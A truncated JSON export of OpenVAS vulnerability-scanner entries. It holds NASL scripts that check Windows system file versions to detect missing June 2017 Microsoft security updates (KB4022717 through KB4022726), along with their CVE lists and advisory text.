and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811168\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\", \"CVE-2017-0287\",\n \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\", \"CVE-2017-8543\",\n \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8462\",\n \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923, 98929,\n 98858, 98859, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98867, 98840, 98884, 98869, 98870, 98901, 98900, 98818, 98842,\n 98848, 98849);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:50:07 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022722)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022722\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3164035, users cannot print\n enhanced metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - Addressed issue where updates were not correctly installing all components and\n would prevent them from booting.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor. For the\n affected systems, follow the steps in the Additional Information section to\n install this update.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM and\n Windows shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022722\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23807\"))\n{\n report = 'File checked: ' + sysPath + \"\\Gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23807\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022724", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811171", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811171\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0289\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\", \"CVE-2017-8522\",\n \"CVE-2017-8469\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98953, 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821,\n 98914, 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826,\n 98932, 98929, 98835, 98836, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98840, 98867, 98869, 98870, 98884, 98901, 98887,\n 98900, 98818, 98848, 98849, 98899, 98926, 98842, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 15:20:54 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - After installing KB3164035, users cannot print enhanced\n metafiles (EMF) or documents containing bitmaps rendered out of bounds using the\n BitMapSection(DIBSection) function.\n\n - Updates were not correctly installing all components and would prevent them from\n booting.\n\n - An unsupported hardware notification is shown and Windows Updates not scanning,\n for systems using the AMD Carrizo DDR4 processor.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM, Internet\n Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022724\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:46:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022717", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811165", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811165", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022717)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022717)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811165\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0291\", \"CVE-2017-0292\",\n \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\",\n \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8493\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914, 98922,\n 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826, 98835,\n 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865, 98867,\n 98840, 98884, 98869, 98870, 98901, 98887, 98850, 98900, 98818,\n 98842, 98848, 98849, 98843, 98844, 98846);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:42:25 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022717)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022717\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3170455 (MS16-087), users have\n difficulty importing printer drivers and get errors with error code 0x80070bcb.\n\n - Addressed a rare issue where mouse input can cease to function. The mouse\n pointer may continue to move, but movements and clicks produce no response other\n than a beeping noise.\n\n - Addressed issue where printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022717\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18698\"))\n{\n report = 'File checked: ' + sysPath + \"\\Win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18698\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "This host is missing a critical security\n update according to Microsoft KB4022719", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811173", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022719)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022719)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811173\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\",\n \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\",\n \"CVE-2017-8543\", \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8547\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\",\n \"CVE-2017-0300\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8524\", \"CVE-2017-8519\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821,\n 98914, 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923,\n 98929, 98858, 98859, 98932, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98900,\n 98818, 98842, 98848, 98849, 98930, 98899);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 16:22:36 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022719)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022719\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are fue to,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - An issue with updates are not correctly installing all components and\n would prevent them from booting.\n\n - An unsupported hardware notification is shown and Windows Updates not\n scanning, for systems using the AMD Carrizo DDR4 processor.\n\n - An error in Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM,\n Internet Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user and take control of an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022719\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.7601.23834\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.7601.23834\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:42:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022726", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811154", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022726)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple 